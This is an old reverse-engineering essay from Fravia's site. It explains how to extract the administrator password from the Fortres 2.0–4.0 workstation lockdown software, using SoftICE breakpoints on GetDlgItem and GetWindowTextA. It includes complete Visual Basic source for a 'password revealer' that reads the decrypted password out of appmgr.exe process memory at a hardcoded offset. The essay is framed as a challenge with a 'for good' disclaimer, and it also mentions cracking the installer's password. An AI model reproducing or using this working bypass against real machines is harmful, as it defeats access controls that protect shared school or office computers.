hotline.htm: Fravia's pages of reverse engineering

I will just publish, from now on, the essays I like exactly as I get them.
Authors are invited to

1) download the source code;
2) correct it;
3) very important CHECK on an Opera browser that it looks ok;
4) resend it to me corrected
And I'll update it.
Note that if the essay should infringe on anyone copyrights, and if I receive a legitimate request to nuke it, it will immediately disappear from my site, so you always better write software reversing essays that are not "specific" target related... so, pointing out deficiences is OK, individuating "software black holes" is a must, but explaining lamers how to register (or, even more silly, how to make a coward keygen for the idiots) is definitely NOT "fraviatiquette".
Indeed from now on I want to HELP, not to damage programmers.
This said I publish this because I reckon that you'll be able to enjoy a very nice hacking/cracking approach. And I believe that protectors should study this with the outmost attention...

where. Thanks and enjoy!



--==[  St0rmer  ]==--



_______________________________________________________________





Greets to all my fellow hackers/crackers. This is my

first essay written for fravia, and I doubt it'll be

my last.



This essay is intended for both hackers (interested in

hacking a computer with Fortres

(http://www.fortres.com for more info)) and crackers

(interested in using "real-time" patches). I myself

used to be a beginner with all of this, so I'll go

slowly and try to explain as much as possible.



First, a little background. My high school uses

Fortres to "protect" (haha) the Windows95 computers to

stop students from writing to the hard-drives,

deleting things, etc. I'm always up to a good

challenge, so I began to look for ways to get around

Fortres. I found literally dozens of "holes" in the

security, due to a combination of ignorant

administrators who didn't know how to configure it

correctly and the fact that Fortres just can't protect

a computer 100%, no matter how well it's configured.

However, there was one slight problem to all the holes

I found... they all required rebooting each time I

wanted to deactivate/reactivate Fortres because the

security is run through a VxD (Virtual Device Driver).

If you don't know what that is, it's simply a process

that can't easily be halted while it's running), and

the methods I used to disable Fortres only removed it

from boot-up. Keep in mind, all this time I was

reporting each hole I found to the network

administrator, even though he really didn't care.



A friend of mine who's a programmer by trade (not a

cracker) was also interested in getting around

Fortres, since he knew I had done it. However, instead

of turning the protection off by rebooting, he said,

"if Fortres can disable the security itself (with a

correct password), then it's possible to make a

program to disable the security". Of course, he wasn't

a cracker, so he wouldn't really know how to go about

doing this kind of stuff. But I thought about what he

said, and realized he was right.



When I got home that day I downloaded Fortres 4.0 (the

newest version at the time) from

http://www.fortres.com, cracked the Installshield

installer so I didn't need a password to install it,

and got to work. But before I go into that, let me

start with version 2.0, build 51, and version 3.0,

build 204 (both of which were given to me AFTER I made

a program to crack 4.0). In this case, I'll pretend

like I cracked 2.0 and 3.0 first since they're a bit

simpler. I'll then go on to explain how to crack 4.0,

and any other versions that you find laying around.





Here's the "walkthrough"...



All right, I assume you have Fortres 2.0 installed (I

tested on build 51). If you're using a different

version or build, don't worry; it's still similar.

Make sure you have Softice installed too and running.

Hackers: Softice is a program that allows debugging of

programs so us crackers can see how they work and how

to crack them. Beginner Crackers: if you're not very

proficient with Softice and/or Assembly, read up at

fravia's site. Just make sure you have USER32.DLL

loaded in your winice.dat and that when you go into

Softice you type 'wd' (to enable the Data Window) and

'wf' twice (to enable the floating-point stack window

(list of registers and their values)).



Let's press Ctrl-Shift-Esc to bring up the Fortres

password dialog box. Type in some random characters

and click OK. The box disappeared. Doh, no error

message to search for with a disassembler. We'll have

to take another approach. Ctrl-Shift-Esc again and

enter some random characters. But this time, before

clicking OK, go into Softice by pressing Ctrl-D and

set breakpoints on the common API functions that

retrieve data from text boxes (bpx <command>, where

<command> = GetWindowText, GetWindowTextA,

GetDlgItemText, and GetDlgItemTextA). You should now

have 4 breakpoints set (you usually don't need to use

the API calls without A's since most modern programs

are 32-bit and only use +A's). Press F5 to get out of

Softice, and click OK in the Fortres password box.

Aww... the box disappeared again and Softice didn't

pop up. It must not be using one of the

above-mentioned API calls. Go back into Softice

(Ctrl-D) and do "bc *" to clear all your breakpoints.

I used Dependency Walker on fortres.exe (comes with

Microsoft Visual Studio Enterprise edition) and found

that it uses GetDlgItem. I just wanted to save you the

trouble of having to disassemble it unnecessarily. OK,

do same thing as above, but instead of bpx'ing the

above functions, bpx GetDlgItem (don't worry, it's not

case sensitive). This time Softice should pop up.



Of course we're in user32.dll when Softice comes up

because that's what GetDlgItem is from. So press F11

to fast-forward out of the GetDlgItem function. Keep

F11'ing (should only be once or twice) until you get

into FORTRES!.text. To save you the time, I'll tell

you now that it does GetDlgItem three times; we are

only going to concentrate on the last time. You'll

have to press F11 eight times until you get to the

section of FORTRES!.text we want. Look down at the

code, and what do we see? CALL [KERNEL32!lstrcmp].

lstrcmp compares two strings. Hmmmmmm... could the two

strings be our guessed password and the REAL one???

Let's go line by line (F10) until we get to the first

'push eax' BEFORE lstrcmp. Once we're on 'push eax',

type "d ds:eax" to see what the first string is that's

being pushed. Gee... that looks like a real password!

Go to 'push ecx' and type "d ds:ecx". Gee... that's

our guessed password! Now we know it's possible to

extract the password from an Fset file (the file that

contains the password for Fortres 2.0). Don't get too

excited though, Fortres 4.0 doesn't make it this easy.



Now for a quick run-through for 3.0 (I tested on build

204), don't worry, it's VERY similar to 2.0. Same

deal... set a break point on GetDlgItem. 3.0 runs

GetDlgItem twice, we're interested in the second time.

Press F11 five times until we get to the section of

FORTRES!.text we want, the part with CALL

[KERNEL32!lstrcmp] right below it. This time the first

'push eax' is the correct password. Once you're on the

first 'push eax' line approaching lstrcmp, do "d

ds:eax" as above. There's the password.



Here we go for 4.0 (I tested on build 94). We can keep

using GetDlgItem for our breakpoint, but I prefer

GetWindowTextA for 4.0 since it supports it. OK, let's

Ctrl-Shift-Esc and type in a bogus password. Ctrl-D

and 'bpx GetWindowTextA'. F5 out of Softice, and press

enter to submit your bogus password. Hello Softice!

Let's start looking for that good ol'

[KERNEL32!lstrcmp] we saw in Fortres 2.0 and 3.0.

It'll hopefully come up before any conditional jumps.

Hmm... no luck. It must be inside one of those CALL's.

Again, you COULD trace through the two CALL's below,

but it'd be easier for me just to tell you where to go

and what to look for (if you want to trace through it

for the challenge, go for it!). The first call is to

capitalize your bogus password. We don't care about

this. So we're going to go into the second call. F10

down to it and press F8 to go into the CALL. Blech...

looks like a bunch of yucky code. Looks like we'll

have to trace through everything... that is, unless we

get lucky with the first CALL down there. Let's go

right up to the 'push eax' and since we want to know

what it's pushing into the CALL (as a parameter),

we'll "d ds:eax". Hmm... nothing good, it's probably a

dead end... unless it's a memory location for the

return value of the CALL. Only one way to find out!

F10 past the CALL and what do we get where EAX was?

Four bytes of 00's and the correct password! Kick ass!





Implementation...



Now it would be great if the computers you were trying

to hack in school or wherever had Softice running on

it. Chances are though, they don't. So let's analyze

some options. Most computers in high schools in

Computer Science classes should have some form of

programming language on them. Whether it be C++,

Visual Basic, Delphi, TASM, etc., you should be able

to write a program to reveal the password as long as

you have access. I'll include the source code for the

password revealer I wrote for Version 4.0 build 94

which I wrote in Visual Basic (the primary reason I

used VB instead of C++ was because it's easier to use

Shell() than CreateProcess()). The only thing we need

to know beforehand is the hex offset of the location

the decrypted password is stored in memory. For 4.0,

build 94, the value with the four 00's and password is

&H68E138 (&H<hex value> is used for Hex values in VB;

in C++, 0x<hex value> is used). Just to be clear,

&H68E138 is the value of EAX right before the CALL

that returns the password, described above for 4.0.

Keep in mind, each version is different, and each

build uses different offsets. Here's the VB source

code for revealing a password for Fortres 4.0, build

94 (I'm not the best coder, so this is in no way

"optimized", but it does the trick):



'--------------------------------------------------------

Private Declare Function OpenProcess Lib "kernel32"

(ByVal dwDesiredAccess As Long, ByVal bInheritHandle

As Long, ByVal dwProcessId As Long) As Long

Private Declare Function ReadProcessMemory Lib

"kernel32" (ByVal hProcess As Long, lpBaseAddress As

Any, lpBuffer As Any, ByVal nSize As Long,

lpNumberOfBytesWritten As Long) As Long

Private Declare Function TerminateProcess Lib

"kernel32" (ByVal hProcess As Long, ByVal uExitCode As

Long) As Long



Public ProcessID As Long

Public processhandle As Long

'--------------------------------------------------------

Private Sub Form_Load()

ProcessID = Shell("c:\fgc\appmgr.exe", vbHide)

	'Running appmgr.exe is equivalent to Ctrl-Shift-Esc

(in versions 2.0 and 3.0, it's fortres.exe)

	'We're keeping the password box hidden just for

aesthetics

	'We're saving the Process ID (PID) in variable

ProcessID for use in OpenProcess

processhandle = OpenProcess(PROCESS_VM_READ, False,

ProcessID)

	'This finds the handle (hwnd) of the appmgr.exe

process we loaded

	'We make sure to open it as "PROCESS_VM_READ" so that

we can do the

	'equivalent of "d ds:..."

Dim mylong As Long

Dim mystring(20) As String

Dim myhexaddr As Long

For z = 1 To 20 'Maximum number of characters in

Fortres password is 20

	myhexaddr = &H68E138 + z * 4 'Prepare to receive the

first two bytes in password

	'&H68E138 is the hex address that varies from build

to build

	x = ReadProcessMemory(ByVal processhandle, ByVal

myhexaddr, mylong, &H4, 0)

	'This will do the equivalent of "d ds:myhexaddr"

	mystring(z) = Hex(mylong)

	'Put the 2 bytes of the password into an array for

string conversion later

	If mylong = 0 Then z = 20

	'If no characters left to receive, stop loop

Next z

x = TerminateProcess(processhandle, 0)

	'We're all done with appmgr.exe, so this terminates

it

Dim entirestring As String

For z = 20 To 1 Step -1

	entirestring = entirestring & mystring(z)

	'Traverse the array and put it into a string

Next z

For z = 1 To 20

	mystring(z) = Mid(entirestring, z * 2, 2)

	'Finish up sorting the array of characters

Next z

Dim realpass As String

realpass = ""

For z = 1 To 20

	On Error Resume Next

	realpass = realpass & Chr(CLng("&H" & mystring(21 -

z)))

	'Convert HEX values into ASCII characters

Next z

x = MsgBox(realpass, vbOKOnly, "Fortres password")

	'Display the Fortres password

End

	'Terminate this VB program

End Sub

'--------------------------------------------------------



And that's it! I hope my code is somewhat readable. If

you don't understand it 100%, play around with it.

Like I said, I didn't really go for optimization, I

just wanted to make sure it worked.





Plans for the future...



Well, the whole "secret" on how to "decrypt" Fortres

passwords has now been "revealed". What's next? If

someone wanted to, they could make a standalone

program to import the Fset and/or *.fg* files (the

encypted password files) and have the program decrypt

the password. This shouldn't be too difficult, all

that's required is stripping the code out of

appmgr.exe or fortres.exe (depending on version of

Fortres) that decrypts the password; this is very

similar to how key generators are made.



Another idea I had was that everyone who was

interested in this could find the respective hex

offsets for the version and build of Fortres they have

and submit it to me (st0rmer@hotmail.com). I could

thus make a database of offsets, and incorporate each

offset into a Fortres Password Revealer program that

would let you specify the version you wanted cracked.





Final comments...



I hope this helped all hackers and crackers interested

in breaking through Fortres via reverse engineering.

I'd be happy to receive all comments and questions

(st0rmer@hotmail.com) you might have; however I'd like

to request that you don't e-mail me on "where can I

get the full version of Fortres" or "how do I crack

Fortres so it doesn't give me an UNREGISTERED nag

screen". As of now, you can get the full version of

Fortres from http://www.fortres.com, and you can

install it with WinZip and Windows Installshield

Decompiler. I DO NOT endorse doing this, because this

IS software piracy, which IS illegal.



I implore you to use all the information you gained

from this essay "for good, not evil". Hack Fortres for

the challenge, not to be malicious and delete all the

files on your school's computers. Always report any

security holes you find to the network administrator

(YES, using Fortres to secure the computer is a

security hole in itself, as I'm sure I made evident

from this essay). If you are a system administrator,

just make sure you understand that no matter what you

do, there will always be SOME WAY to get around

security in a Windows95/98 environment. Either use a

different operating system or better system

protection.



Thank you for spending your time reading my work. I

hope it was as enjoyable and insightful for you to

read as it was for me to write.





Greets go out to fravia+, +ORC, HarvestR, Iczelion, Lord

Caligo, __y, Filer, Fourteen, Toxic, TooBad, Santa,

Compudaze, Zio, TDC, Jimmy Jam, Lithium2, VBRunner,

Coinman415, Xcalibur, and Wrexen (in no specific order)